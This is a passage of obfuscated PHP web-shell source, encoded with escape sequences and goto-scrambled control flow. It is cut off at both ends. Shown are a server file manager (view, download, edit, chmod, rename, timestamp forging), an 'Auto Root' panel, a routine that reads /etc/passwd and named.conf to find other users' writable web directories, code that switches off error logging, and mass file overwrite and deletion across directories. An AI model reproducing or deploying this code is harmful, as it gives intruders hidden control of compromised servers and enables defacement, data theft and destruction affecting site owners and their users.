3e\x47\x72\157\165\160\72\74\x2f\163\160\141\156\76\46\156\x62\x73\x70\73\46\x6e\x62\163\160\x3b\x26\x6e\x62\163\160\73".$gid."\x20\50\x20".$group."\40\x29\x3c\x62\162\76".@phpversion()."\40\x3c\163\160\141\x6e\x3e\123\141\146\145\x20\x6d\x6f\x64\x65\x3a\x3c\x2f\163\160\141\156\76\x26\156\x62\x73\x70\x3b\x26\x6e\142\x73\160\73\x26\156\x62\x73\x70\x3b".($GLOBALS["\163\141\146\145\x5f\x6d\157\144\x65"]?"\74\146\157\156\164\x20\x63\157\154\x6f\162\75\x72\145\x64\x3e\x4f\116\74\57\x66\x6f\156\x74\76":"\74\x66\x6f\156\x74\x20\x63\157\x6c\157\162\75\43\146\146\146\x66\x66\146\76\74\142\76\117\x46\x46\74\x2f\142\76\x3c\x2f\146\x6f\x6e\x74\x3e")."\40\x3c\141\x20\150\162\x65\146\x3d\43\x20\157\156\x63\x6c\x69\143\153\75\x22\147\50\47\120\x68\160\x27\54\x6e\x75\154\x6c\54\x6e\x75\154\x6c\54\x27\x69\156\x66\x6f\47\x29\x22\x3e\x5b\40\160\x68\x70\x69\156\x66\157\40\135\74\x2f\141\76\40\x3c\163\160\141\156\x3e\x44\141\164\x65\x74\151\155\x65\72\74\x2f\163\x70\x61\x6e\76\x26\x6e\x62\163\x70\x3b\x26\x6e\x62\163\x70\x3b\46\x6e\x62\x73\160\73".date("\x59\x2d\155\55\144\40\110\x3a\151\72\163")."\x3c\142\162\x3e".viewSize($totalSpace)."\x20\74\x73\x70\141\156\76\106\162\145\x65\x3a\x3c\57\163\160\x61\x6e\76\46\156\x62\163\160\x3b\x26\156\142\x73\x70\x3b\46\156\x62\163\160\x3b".viewSize($freeSpace)."\40\x28".round(100/($totalSpace/$freeSpace),2)."\45\x29\x3c\x62\162\x3e".$cwd_links."\x20".viewPermsColor($GLOBALS["\x63\x77\x64"])."\40\74\141\x20\x68\x72\x65\146\75\x23\40\157\x6e\x63\x6c\151\143\x6b\x3d\42\147\x28\x27\106\x69\x6c\x65\x73\115\141\156\x27\x2c\x27".$GLOBALS["\x68\157\155\145\137\143\x77\144"]."\47\x2c\47\x27\x2c\47\x27\54\x27\x27\x29\42\x3e\x5b\40\150\157\x6d\145\40\135\x3c\57\141\x3e\74\x62\162\76".$drives."\x3c\x2f\x74\x64\76"."\x3c\x74\x64\40\167\x69\144\x74\150\x3d\61\40\x61\154\x69\147\x6e\75\x72\151\147\150\164\76\74\156\x6f\x62\x72\76\x3c\x6c\x61\x62\x65\154\x3e\x3c\163\145\x6c\x65\x63\164\40\x6f\156\143\150\141\156\x67\145\x3d\42\147\50\156\165\x6c\x6c\x2c\156\165\154\x6c\x2c\x6e\x75\154\x6c\x2c\156\165\154\x6c\x2c\156\165\x6c\x6c\x2c\x74\150\151\x73\x2e\x76\x61\154\165\x65\51\x22\x3e".$opt_charsets."\x3c\57\x73\x65\154\145\x63\x74\x3e\74\x2f\154\141\x62\145\x6c\76\74\x62\162\x3e\x3c\x73\160\x61\156\x3e\123\x65\x72\166\145\162\40\111\120\72\74\x2f\x73\x70\x61\156\76\74\142\x72\76".gethostbyname($_SERVER["\x48\x54\x54\120\x5f\x48\x4f\x53\x54"])."\74\x62\x72\76\x3c\163\x70\141\x6e\76\x43\x6c\x69\x65\156\164\x20\x49\120\x3a\x3c\x2f\163\160\x61\156\x3e\74\142\162\76".$_SERVER["\122\x45\115\117\x54\x45\x5f\x41\104\x44\x52"]."\74\x2f\156\x6f\142\162\x3e\x3c\x2f\164\144\76\x3c\57\164\162\76\x3c\x2f\164\x61\142\154\145\x3e"."\x3c\x74\x61\x62\154\x65\x20\x73\x74\x79\x6c\x65\75\42\142\x61\143\x6b\147\x72\x6f\x75\156\x64\55\x63\x6f\x6c\x6f\x72\x3a\x23\x39\x63\71\70\x32\145\73\x22\x20\x63\x65\154\154\160\x61\144\144\151\x6e\147\x3d\x33\x20\143\x65\x6c\154\163\160\x61\143\x69\156\147\x3d\60\x20\x77\x69\x64\164\150\75\61\60\60\x25\76\74\x74\162\x3e".$menu."\74\x2f\164\x72\x3e\74\x2f\x74\141\x62\x6c\x65\x3e\74\144\151\166\76";}goto cnbni;mPK0W:ini_set("\150\164\155\x6c\137\145\x72\x72\x6f\162\x73",0);goto Zs2Nm;sgdrg:if(get_magic_quotes_gpc()){function stripslashes_array($array){return is_array($array)?array_map("\163\x74\162\151\x70\x73\154\141\x73\150\145\163\137\x61\x72\162\141\x79",$array):stripslashes($array);}$_POST=stripslashes_array($_POST);$_COOKIE=stripslashes_array($_COOKIE);}goto J5SK5;Jclr3:function actionAutoRoot(){hardHeader();echo "\74\143\145\x6e\x74\x65\162\x3e\74\150\x31\x3e\101\165\164\x6f\40\x52\x6f\x6f\164\74\57\150\x31\76\74\144\151\x76\x20\143\154\141\163\163\75\x63\x6f\156\x74\145\x6e\164\x3e\74\x62\162\76";echo "\x3c\142\x72\76\74\x63\145\x6e\164\145\x72\x3e\x20\74\x69\146\x72\141\x6d\x65\40\146\162\141\155\x65\x42\x6f\162\144\x65\x72\75\60\x20\163\x72\x63\x3d\x27\x3f\x61\165\164\x6f\162\47\x20\167\x69\x64\x74\150\75\47\70\x30\60\x27\x20\150\x65\151\147\150\x74\75\47\64\65\x30\x27\x3e\74\57\x69\x66\162\x61\155\x65\x3e\74\57\x61\76\74\x2f\144\151\x76\x3e";hardFooter();}goto QAY2s;B09fV:function actionFilesTools(){if(isset($_POST["\160\61"])){$_POST["\160\x31"]=urldecode($_POST["\x70\61"]);}if(@$_POST["\160\x32"]=="\x64\x6f\x77\x6e\154\157\x61\x64"){if(@is_file($_POST["\x70\x31"])&&@is_readable($_POST["\x70\x31"])){ob_start("\x6f\x62\x5f\147\172\x68\x61\x6e\144\x6c\145\x72",4096);header("\x43\157\x6e\x74\x65\x6e\x74\x2d\x44\151\163\x70\x6f\x73\151\164\x69\x6f\156\x3a\x20\141\164\164\x61\143\150\x6d\x65\156\164\73\40\x66\151\154\x65\x6e\141\155\145\x3d".basename($_POST["\x70\x31"]));if(function_exists("\x6d\x69\155\145\x5f\143\x6f\x6e\164\145\x6e\164\x5f\164\171\x70\x65")){$type=@mime_content_type($_POST["\160\61"]);header("\x43\157\156\x74\x65\156\164\55\x54\171\x70\x65\x3a\40".$type);}else{header("\x43\157\x6e\x74\145\156\x74\x2d\124\x79\x70\x65\x3a\x20\141\x70\x70\x6c\x69\143\x61\164\x69\157\156\x2f\x6f\x63\x74\145\x74\55\x73\x74\x72\145\x61\155");}$fp=@fopen($_POST["\160\x31"],"\x72");if($fp){while(!@feof($fp)){echo@fread($fp,1024);}fclose($fp);}}die;}if(@$_POST["\160\x32"]=="\x6d\x6b\146\151\x6c\145"){if(!file_exists($_POST["\x70\61"])){$fp=@fopen($_POST["\160\61"],"\167");if($fp){$_POST["\x70\x32"]="\145\144\151\x74";fclose($fp);}}}hardHeader();echo "\x3c\x68\x31\x3e\106\x69\x6c\145\x20\164\157\157\154\x73\74\x2f\150\x31\76\x3c\x64\x69\166\40\143\x6c\x61\x73\x73\x3d\143\x6f\156\164\145\156\164\76";if(!file_exists(@$_POST["\x70\x31"])){echo "\106\151\154\145\x20\x6e\x6f\x74\40\x65\x78\x69\163\x74\163";hardFooter();return;}$uid=@posix_getpwuid(@fileowner($_POST["\x70\61"]));if(!$uid){$uid["\x6e\141\155\145"]=@fileowner($_POST["\x70\61"]);$gid["\x6e\x61\x6d\x65"]=@filegroup($_POST["\x70\x31"]);}else{$gid=@posix_getgrgid(@filegroup($_POST["\160\x31"]));}echo "\74\x73\160\x61\156\76\116\141\x6d\145\72\x3c\57\163\160\141\x6e\76\x26\x6e\142\x73\160\x3b\x26\156\x62\163\160\73\46\156\142\163\160\73".htmlspecialchars(@basename($_POST["\x70\x31"]))."\40\74\163\160\x61\x6e\x3e\123\151\x7a\x65\72\x3c\x2f\163\x70\x61\156\76\x26\156\142\163\160\x3b\46\x6e\142\163\160\x3b\46\156\x62\x73\160\73".(is_file($_POST["\x70\61"])?viewSize(filesize($_POST["\x70\61"])):"\55")."\x20\x3c\x73\x70\141\156\76\120\x65\x72\x6d\x69\x73\163\151\x6f\x6e\72\x3c\x2f\x73\x70\141\156\x3e\46\156\x62\163\x70\x3b\x26\156\x62\163\x70\x3b\x26\x6e\142\163\x70\73".viewPermsColor($_POST["\x70\61"])."\40\x3c\163\x70\x61\156\x3e\x4f\x77\156\x65\162\57\107\162\x6f\165\x70\72\x3c\57\x73\x70\x61\156\x3e\46\156\142\163\x70\x3b\46\156\142\x73\x70\73\x26\x6e\x62\163\x70\x3b".$uid["\156\x61\155\145"]."\57".$gid["\x6e\x61\155\x65"]."\x3c\x62\x72\x3e";echo "\74\163\x70\x61\x6e\76\103\162\x65\141\164\x65\40\164\151\x6d\145\x3a\x3c\x2f\x73\x70\141\156\x3e\46\x6e\142\163\160\73\x26\156\142\x73\160\x3b\46\x6e\x62\163\160\x3b".date("\131\x2d\x6d\55\144\40\110\72\x69\72\163",filectime($_POST["\x70\61"]))."\x20\74\x73\x70\141\156\76\x41\x63\143\145\x73\x73\x20\164\x69\155\x65\72\74\x2f\x73\x70\x61\156\76\x26\156\x62\x73\x70\73\46\156\x62\163\x70\x3b\x26\156\x62\163\160\73".date("\131\x2d\x6d\x2d\x64\40\x48\72\x69\x3a\163",fileatime($_POST["\x70\x31"]))."\x20\74\163\160\x61\x6e\x3e\115\157\x64\x69\x66\x79\40\164\x69\x6d\145\x3a\x3c\x2f\163\160\141\156\x3e\x26\156\142\163\160\x3b\46\x6e\x62\x73\x70\x3b\46\x6e\x62\163\160\x3b".date("\131\x2d\155\55\144\40\110\72\x69\72\x73",filemtime($_POST["\160\x31"]))."\74\142\162\76\x3c\142\x72\x3e";if(empty($_POST["\160\x32"])){$_POST["\x70\x32"]="\x76\x69\x65\167";}if(is_file($_POST["\x70\61"])){$m=array("\x56\151\x65\x77","\110\x69\x67\x68\x6c\151\x67\x68\x74","\x44\x6f\167\156\x6c\157\141\x64","\110\145\x78\x64\165\x6d\160","\105\144\151\x74","\103\x68\155\157\144","\122\x65\156\141\x6d\145","\124\x6f\x75\x63\150","\106\162\x61\x6d\x65");}else{$m=array("\x43\150\x6d\157\144","\122\145\x6e\141\155\145","\124\157\165\x63\150");}foreach($m as $v){echo "\74\x61\x20\150\x72\x65\146\75\x23\x20\x6f\156\143\x6c\151\x63\x6b\x3d\x22\x67\50\156\x75\x6c\154\x2c\156\x75\154\154\54\x27".urlencode($_POST["\160\x31"])."\47\54\47".strtolower($v)."\x27\51\42\x3e".(strtolower($v)==@$_POST["\x70\62"]?"\74\142\76\133\x20".$v."\x20\x5d\74\x2f\142\x3e":$v)."\x3c\x2f\141\76\40";}echo "\74\142\x72\76\x3c\x62\x72\x3e";switch($_POST["\x70\x32"]){case "\x76\x69\145\167":echo "\74\160\162\x65\x20\x63\x6c\141\x73\x73\75\x6d\154\x31\76";$fp=@fopen($_POST["\160\x31"],"\x72");if($fp){while(!@feof($fp)){echo htmlspecialchars(@fread($fp,1024));}@fclose($fp);}echo "\74\57\160\x72\145\76";break;case "\150\x69\147\150\x6c\x69\x67\x68\164":if(@is_readable($_POST["\x70\x31"])){echo "\74\x64\151\166\40\143\x6c\141\163\x73\75\x6d\x6c\61\x20\163\x74\x79\154\x65\75\42\x62\x61\143\x6b\x67\x72\x6f\165\x6e\144\55\x63\157\154\x6f\162\x3a\x20\43\145\x31\145\61\x65\61\x3b\143\157\x6c\x6f\x72\72\142\x6c\141\x63\153\x3b\x22\x3e";$oRb=@highlight_file($_POST["\x70\x31"],true);echo str_replace(array("\74\163\160\141\156\x20","\74\57\163\160\x61\156\x3e"),array("\x3c\x66\x6f\156\x74\40","\x3c\57\x66\x6f\156\x74\76"),$oRb)."\x3c\x2f\x64\x69\x76\x3e";}break;case "\143\x68\155\157\144":if(!empty($_POST["\x70\x33"])){$perms=0;for($i=strlen($_POST["\x70\63"])-1;$i>=0;--$i){$perms+=(int) $_POST["\x70\63"][$i]*pow(8,strlen($_POST["\x70\x33"])-$i-1);}if(!@chmod($_POST["\x70\x31"],$perms)){echo "\x43\x61\x6e\47\164\x20\x73\x65\164\x20\160\145\x72\155\151\x73\163\151\157\156\163\x21\74\x62\x72\76\x3c\163\143\x72\x69\160\x74\x3e\x64\157\x63\165\x6d\x65\156\164\56\155\146\56\x70\63\56\x76\141\x6c\x75\145\75\x22\x22\73\74\x2f\163\143\162\151\160\164\76";}}clearstatcache();echo "\x3c\x73\x63\x72\151\160\x74\x3e\x70\x33\x5f\75\x22\42\x3b\74\x2f\x73\143\x72\151\x70\x74\x3e\x3c\146\157\162\x6d\40\x6f\x6e\x73\x75\x62\x6d\151\164\x3d\x22\147\x28\156\165\x6c\154\54\156\165\x6c\x6c\x2c\x27".urlencode($_POST["\x70\61"])."\47\x2c\156\165\154\x6c\54\164\150\x69\163\x2e\143\150\155\157\144\x2e\166\141\x6c\x75\x65\x29\73\x72\145\x74\165\162\x6e\x20\x66\x61\154\163\145\73\x22\76\74\151\x6e\x70\x75\164\x20\x74\x79\160\x65\75\x74\145\170\164\x20\156\x61\155\x65\x3d\x63\x68\x6d\157\x64\40\166\x61\x6c\x75\x65\75\42".substr(sprintf("\45\157",fileperms($_POST["\160\61"])),-4)."\x22\76\x3c\x69\x6e\x70\165\164\40\x74\171\x70\145\75\x73\x75\x62\155\151\164\40\166\141\154\x75\145\75\42\163\x75\x62\155\151\x74\x22\x3e\x3c\x2f\x66\157\162\x6d\76";break;case "\x65\144\x69\x74":if(!is_writable($_POST["\x70\61"])){echo "\x46\x69\x6c\x65\40\151\x73\x6e\47\164\x20\167\x72\x69\164\x65\141\x62\x6c\x65";break;}if(!empty($_POST["\160\x33"])){$time=@filemtime($_POST["\x70\x31"]);$_POST["\x70\x33"]=substr($_POST["\x70\x33"],1);$fp=@fopen($_POST["\160\61"],"\x77");if($fp){@fwrite($fp,$_POST["\160\63"]);@fclose($fp);echo "\x53\141\166\x65\x64\41\74\x62\x72\76\x3c\x73\x63\162\x69\160\x74\x3e\160\63\137\x3d\x22\x22\73\x3c\x2f\x73\x63\x72\x69\160\164\x3e";@touch($_POST["\160\61"],$time,$time);}}echo "\x3c\146\157\162\x6d\40\x6f\x6e\x73\x75\x62\x6d\151\x74\75\42\x67\x28\x6e\165\154\154\54\x6e\165\x6c\x6c\54\47".urlencode($_POST["\x70\61"])."\x27\x2c\156\165\x6c\154\x2c\47\61\x27\53\164\x68\x69\163\56\x74\145\x78\x74\56\x76\141\x6c\x75\x65\51\73\162\145\164\x75\x72\156\40\146\x61\x6c\x73\145\73\x22\x3e\x3c\x74\x65\x78\x74\141\x72\x65\x61\x20\x6e\141\155\145\75\x74\x65\170\164\x20\x63\x6c\141\x73\x73\75\x62\151\x67\141\162\x65\x61\76";$fp=@fopen($_POST["\160\x31"],"\x72");if($fp){while(!@feof($fp)){echo htmlspecialchars(@fread($fp,1024));}@fclose($fp);}echo "\74\57\164\x65\170\164\x61\162\145\141\x3e\74\151\x6e\x70\165\x74\40\x74\x79\160\145\75\163\x75\x62\155\x69\x74\40\166\x61\x6c\x75\x65\x3d\x22\163\x75\x62\155\151\164\x22\x3e\74\57\146\x6f\x72\155\76";break;case "\150\x65\x78\x64\165\x6d\160":$c=@file_get_contents($_POST["\x70\61"]);$n=0;$h=array("\60\x30\x30\x30\x30\60\60\x30\74\142\x72\76",'','');$len=strlen($c);for($i=0;$i<$len;++$i){$h[1].=sprintf("\x25\x30\x32\x58",ord($c[$i]))."\40";switch(ord($c[$i])){case 0:$h[2].="\x20";break;case 9:$h[2].="\40";break;case 10:$h[2].="\x20";break;case 13:$h[2].="\40";break;default:$h[2].=$c[$i];break;}$n++;if($n==32){$n=0;if($i+1<$len){$h[0].=sprintf("\x25\60\70\x58",$i+1)."\74\x62\162\x3e";}$h[1].="\x3c\x62\162\76";$h[2].="\xa";}}echo "\x3c\x74\x61\x62\154\x65\40\143\x65\154\x6c\x73\x70\141\143\x69\156\147\x3d\x31\x20\x63\145\154\154\160\141\x64\x64\151\156\x67\75\65\x20\142\147\143\157\154\157\162\x3d\43\x32\62\62\x3e\74\164\162\76\74\x74\x64\40\x62\147\143\157\x6c\157\162\x3d\43\62\x30\x32\70\63\x32\x3e\x3c\x73\x70\141\156\40\163\164\x79\x6c\145\75\42\146\x6f\x6e\164\55\x77\145\x69\147\150\164\72\x20\156\157\162\x6d\141\x6c\x3b\42\76\74\160\x72\145\x3e".$h[0]."\74\x2f\x70\x72\145\76\74\57\x73\160\x61\x6e\x3e\x3c\57\x74\144\76\74\x74\x64\40\x62\x67\143\x6f\x6c\157\x72\75\43\x30\60\60\x30\x30\60\x3e\74\160\x72\x65\76".$h[1]."\x3c\x2f\160\x72\x65\x3e\x3c\57\164\x64\76\x3c\x74\x64\40\142\x67\143\157\154\157\162\75\43\62\x30\x32\70\63\62\76\74\x70\x72\x65\x3e".htmlspecialchars($h[2])."\x3c\x2f\160\162\x65\x3e\74\x2f\x74\x64\x3e\74\x2f\x74\x72\76\x3c\57\164\141\142\x6c\x65\x3e";break;case "\x72\145\156\141\x6d\145":if(!empty($_POST["\x70\63"])){if(!@rename($_POST["\x70\x31"],$_POST["\160\63"])){echo "\103\x61\156\x27\164\x20\x72\145\x6e\141\x6d\145\41\74\x62\x72\76";}else{die("\x3c\x73\x63\162\151\x70\x74\x3e\x67\x28\156\x75\154\154\54\156\x75\154\154\54\x22".urlencode($_POST["\x70\63"])."\x22\54\x6e\165\154\x6c\54\x22\42\51\74\x2f\x73\143\162\151\x70\x74\76");}}echo "\74\x66\157\x72\x6d\x20\x6f\x6e\x73\x75\x62\155\151\x74\x3d\42\147\x28\156\165\154\x6c\54\156\165\154\x6c\54\x27".urlencode($_POST["\160\61"])."\x27\54\156\165\154\x6c\x2c\164\150\151\163\x2e\x6e\141\x6d\145\56\x76\x61\154\x75\x65\51\73\x72\x65\164\x75\x72\x6e\x20\x66\x61\x6c\x73\x65\x3b\x22\x3e\x3c\151\156\x70\165\164\40\x74\x79\x70\x65\75\164\x65\x78\164\40\156\141\x6d\145\x3d\x6e\x61\155\145\x20\x76\x61\x6c\x75\145\75\42".htmlspecialchars($_POST["\x70\x31"])."\42\76\x3c\151\x6e\x70\x75\x74\x20\x74\171\x70\x65\x3d\x73\165\142\155\x69\x74\40\x76\141\154\x75\145\x3d\42\x73\165\x62\155\x69\164\x22\x3e\74\x2f\146\x6f\x72\x6d\x3e";break;case "\164\157\165\143\x68":if(!empty($_POST["\x70\x33"])){$time=strtotime($_POST["\160\x33"]);if($time){if(!touch($_POST["\x70\x31"],$time,$time)){echo "\x46\x61\151\154\x21";}else{echo "\x54\157\165\143\150\145\x64\x21";}}else{echo "\102\141\x64\40\164\151\x6d\145\40\x66\x6f\162\155\x61\x74\41";}}clearstatcache();echo "\74\163\x63\162\x69\x70\x74\x3e\160\x33\137\x3d\42\x22\73\74\57\163\x63\162\x69\x70\164\x3e\x3c\x66\x6f\162\155\40\x6f\x6e\163\x75\142\155\x69\x74\75\42\x67\x28\156\x75\x6c\154\x2c\156\165\154\x6c\54\47".urlencode($_POST["\160\x31"])."\x27\x2c\156\165\x6c\154\54\x74\x68\x69\x73\56\x74\x6f\165\143\150\x2e\x76\141\154\x75\145\51\73\x72\x65\164\x75\x72\156\40\146\x61\154\163\145\73\x22\76\x3c\151\156\x70\165\164\x20\164\171\160\145\75\x74\x65\170\164\x20\156\141\155\145\75\164\x6f\165\143\150\x20\x76\x61\154\165\x65\x3d\x22".date("\x59\55\x6d\x2d\144\40\110\x3a\x69\x3a\163",@filemtime($_POST["\160\x31"]))."\42\x3e\x3c\151\156\160\165\x74\x20\x74\171\160\145\75\x73\165\x62\155\x69\164\40\166\141\x6c\165\145\x3d\42\163\165\142\x6d\x69\164\42\x3e\74\x2f\146\157\x72\155\x3e";break;case "\x66\162\141\x6d\145":$frameSrc=substr(htmlspecialchars($GLOBALS["\143\167\x64"]),strlen(htmlspecialchars($_SERVER["\x44\117\x43\x55\x4d\105\116\124\x5f\x52\x4f\117\x54"])));if($frameSrc[0]!="\57"){$frameSrc="\x2f".$frameSrc;}if($frameSrc[strlen($frameSrc)-1]!="\57"){$frameSrc=$frameSrc."\x2f";}$frameSrc=$frameSrc.htmlspecialchars($_POST["\x70\x31"]);echo "\x3c\151\146\x72\141\x6d\145\x20\x66\162\x61\x6d\145\102\157\162\144\145\162\75\60\40\x77\x69\x64\164\x68\75\42\x31\x30\60\45\42\x20\150\x65\151\147\x68\164\75\42\x39\x30\60\x70\x78\x22\40\163\x63\162\157\154\x6c\151\x6e\147\75\42\156\x6f\42\x20\x73\x72\143\x3d".$frameSrc."\40\157\x6e\154\157\x61\x64\75\42\x6f\156\x6c\157\141\x64\75\150\x65\x69\147\x68\164\x3d\x63\x6f\156\x74\x65\156\164\104\157\143\165\155\x65\x6e\x74\x2e\142\x6f\144\171\x2e\163\143\x72\x6f\154\154\x48\145\151\x67\150\x74\x22\x3e\74\x2f\x69\146\x72\141\155\145\x3e";break;}echo "\x3c\57\144\151\x76\x3e";hardFooter();}goto Rw6YU;qJRtx:ini_set("\x65\x72\162\x6f\162\x5f\x6c\157\147",null);goto izs2B;zPNwz:function actionStringTools(){hardHeader();echo "\74\143\x65\x6e\164\x65\x72\76\74\150\61\76\x4a\165\x6d\x70\151\x6e\x67\x20\72\x44\x3c\x2f\150\61\76\74\144\151\x76\40\x63\x6c\141\x73\x73\x3d\x63\157\156\164\x65\x6e\x74\x3e\x3c\142\162\x3e";$i=0;@ini_set("\x64\x69\163\x70\154\x61\x79\x5f\145\162\162\157\162\x73",0);echo "\x3c\160\162\145\x3e\x3c\x64\x69\166\40\143\154\141\163\x73\x3d\x27\x6d\x61\x72\147\x69\x6e\72\40\x35\x70\x78\x20\x61\x75\x74\157\x3b\x27\76";$etc=fopen("\x2f\x65\164\x63\57\160\141\x73\163\x77\144","\162")or die("\x3c\x66\x6f\156\164\x20\x63\157\x6c\x6f\162\x3d\167\150\x69\164\x65\76\103\x61\156\x27\164\x20\x72\x65\x61\144\40\x2f\x65\x74\143\57\160\141\163\x73\167\144\x3c\57\x66\x6f\156\x74\76");while($passwd=fgets($etc)){if($passwd==''||!$etc){echo "\x3c\146\x6f\156\x74\40\x63\157\x6c\x6f\x72\x3d\167\x68\x69\x74\x65\x3e\x43\x61\156\47\164\40\162\x65\x61\x64\x20\57\145\164\x63\x2f\160\x61\163\163\x77\144\74\57\x66\157\x6e\x74\x3e";}else{preg_match_all("\57\50\x2e\52\77\51\72\170\72\57",$passwd,$user_jumping);foreach($user_jumping[1]as $user_khoer_jump){$user_jumping_dir="\57\150\157\155\x65\57{$user_khoer_jump}\x2f\160\x75\x62\154\x69\143\137\x68\164\155\154";if(is_readable($user_jumping_dir)){$i++;$jrw="\x5b\74\146\x6f\x6e\164\40\143\x6f\154\157\x72\x3d\x77\x68\x69\164\145\x3e\122\74\57\146\157\156\164\76\x5d\40\74\x61\x20\150\x72\145\146\75\x27\x3f\160\141\x74\x68\75{$user_jumping_dir}\x27\76\74\146\x6f\156\x74\x20\x63\157\154\x6f\x72\75\x23\146\x66\146\76{$user_jumping_dir}\74\x2f\146\157\x6e\164\76\x3c\57\x61\x3e";if(is_writable($user_jumping_dir)){$jrw="\x5b\74\x66\157\156\164\x20\x63\x6f\x6c\x6f\162\x3d\x77\x68\x69\164\x65\x3e\122\127\74\57\x66\157\x6e\x74\x3e\x5d\40\74\141\40\x68\x72\x65\x66\75\47\77\x70\141\x74\x68\75{$user_jumping_dir}\x27\x3e\74\x66\x6f\156\164\40\x63\x6f\154\157\162\75\x23\x66\146\146\76{$user_jumping_dir}\x3c\57\146\157\156\164\76\74\x2f\x61\x3e";}echo $jrw;if(function_exists("\x70\x6f\163\x69\x78\x5f\147\x65\x74\x70\167\x75\151\144")){$domain_jump=file_get_contents("\x2f\145\x74\143\57\156\141\x6d\145\x64\56\x63\x6f\x6e\x66");if($domain_jump==''){echo "\40\75\76\40\50\40\74\146\x6f\156\x74\40\x63\157\154\157\x72\75\167\x68\151\164\x65\x3e\111\40\143\141\156\47\164\x20\x74\x61\153\145\40\x74\150\145\x20\144\x6f\x6d\x61\x69\x6e\x20\x6e\141\155\145\74\57\x66\x6f\x6e\x74\76\x20\51\x3c\x62\x72\76";}else{preg_match_all("\x23\57\166\141\x72\x2f\156\x61\155\145\x64\x2f\x28\56\52\77\51\56\144\x62\x23",$domain_jump,$domains_jump);foreach($domains_jump[1]as $dj){$user_jumping_url=posix_getpwuid(@fileowner("\57\145\x74\143\x2f\166\141\154\x69\141\163\x65\x73\57{$dj}"));$user_jumping_url=$user_jumping_url["\x6e\x61\155\145"];if($user_jumping_url==$user_khoer_jump){echo"\40\75\76\x20\x28\x20\x3c\x75\76{$dj}\74\57\165\x3e\x20\x29\x3c\x62\x72\x3e";break;}}}}else{echo "\x3c\x62\162\x3e";}}}}}if($i==0){}else{echo "\x3c\x62\x72\x3e\x54\x6f\164\x61\154\40".$i."\40\x44\x69\x72\x65\x63\164\x6f\x72\171\40".gethostbyname($_SERVER["\110\124\124\x50\137\x48\117\123\x54"]).'';}echo "\74\57\x64\151\x76\x3e\x3c\57\160\x72\145\76";echo "\74\57\144\151\x76\76";hardFooter();}goto d0Oeq;rpdXp:function viewSize($s){if($s>=1073741824){return sprintf("\45\61\x2e\62\x66",$s/1073741824)."\40\107\102";}elseif($s>=1048576){return sprintf("\45\x31\x2e\x32\x66",$s/1048576)."\40\115\102";}elseif($s>=1024){return sprintf("\x25\x31\56\x32\x66",$s/1024)."\x20\x4b\x42";}else{return $s."\x20\102";}}goto Ulmtn;M1Qpe:function viewPermsColor($f){if(!@is_readable($f)){return "\74\x66\157\x6e\x74\40\143\x6f\154\157\x72\x3d\162\x65\144\76\74\x62\76".perms(@fileperms($f))."\74\57\x62\x3e\74\x2f\x66\x6f\x6e\164\76";}elseif(!@is_writable($f)){return "\74\x66\157\156\x74\x20\143\x6f\154\x6f\x72\75\162\x65\x64\x3e\x3c\x62\76".perms(@fileperms($f))."\x3c\57\x62\x3e\x3c\x2f\x66\157\156\x74\x3e";}else{return "\74\146\157\156\x74\40\x63\157\154\157\162\75\43\146\x66\x64\142\x35\x66\x3e\x3c\x62\76".perms(@fileperms($f))."\74\x2f\x62\76\74\57\146\157\156\x74\76";}}goto Bxufz;RSlVA:if(empty($_SESSION["\153\x65\x79\170\170"])){$keyxxx=generateRandomString();$_SESSION["\x6b\145\171\170\170"]=$keyxxx;}goto jJ2Wl;jAXHO:if($cwd[strlen($cwd)-1]!="\57"){$cwd.="\x2f";}goto HaRXp;sVdqn:if(isset($_REQUEST["\155\x61\x73"])){@ini_set("\145\162\162\x6f\x72\x5f\154\157\147",NULL);@ini_set("\154\157\147\137\145\x72\162\x6f\x72\163",0);@ini_set("\x6d\141\170\137\x65\x78\145\143\x75\x74\x69\157\x6e\x5f\x74\x69\x6d\x65",0);@ini_set("\157\x75\x74\160\x75\x74\x5f\x62\165\x66\146\x65\162\151\156\147",0);@ini_set("\144\151\x73\x70\x6c\141\x79\137\145\162\162\x6f\x72\x73",0);echo "\x3c\x63\145\156\164\x65\x72\x3e\74\146\157\x72\155\x20\141\x63\164\151\157\156\75\x22\42\40\x6d\145\x74\x68\x6f\x64\75\x22\x70\x6f\163\x74\x22\76\40";function edit_file($file,$index){if(is_writable($file)){clear_fill($file,$index);echo "\x3c\x53\x70\x61\x6e\x20\x73\164\x79\x6c\x65\75\x27\143\157\154\x6f\x72\x3a\x67\x72\145\145\156\73\x27\76\74\x73\164\x72\x6f\156\x67\x3e\x20\x5b\53\135\40\104\x6f\x6e\x65\40\61\x30\60\45\x20\x53\165\143\143\x65\163\x73\146\165\154\x6c\x20\x3c\57\163\164\x72\157\156\147\76\74\x2f\x73\160\x61\156\x3e\74\x62\162\x3e\74\x2f\143\x65\156\164\145\162\x3e";}else{echo "\x3c\123\x70\x61\x6e\x20\163\164\x79\154\145\x3d\47\143\157\154\x6f\x72\x3a\x72\x65\144\73\x27\x3e\74\x73\164\162\157\156\147\x3e\40\133\x2d\135\40\x46\141\151\154\x65\144\40\72\x28\40\74\57\x73\x74\162\x6f\156\147\76\x3c\57\163\x70\141\156\x3e\x3c\142\x72\76\74\x2f\x63\x65\x6e\164\x65\x72\76";}}function hapus_Massal($dir,$namafile){if(is_writable($dir)){$dira=scandir($dir);foreach($dira as $dirb){$dirc="{$dir}\57{$dirb}";$lokasi=$dirc."\57".$namafile;if($dirb==="\56"){if(file_exists("{$dir}\57{$namafile}")){unlink("{$dir}\x2f{$namafile}");}}elseif($dirb==="\x2e\x2e"){if(file_exists(''.dirname($dir)."\x2f{$namafile}")){unlink(''.dirname($dir)."\57{$namafile}");}}else{if(is_dir($dirc)){if(is_writable($dirc)){if(file_exists($lokasi)){echo"\133\x3c\146\157\x6e\164\40\x63\157\154\157\162\x3d\x72\145\144\x3e\x44\105\x4c\105\x54\105\x44\x3c\57\x66\x6f\156\164\76\x5d\x20{$lokasi}\x3c\x62\x72\x3e";unlink($lokasi);$idx=hapus_Massal($dirc,$namafile);}}}}}}}function clear_fill($file,$index){if(file_exists($file)){$handle=fopen($file,"\x77");fwrite($handle,'');fwrite($handle,$index);fclose($handle);}}function gass(){global 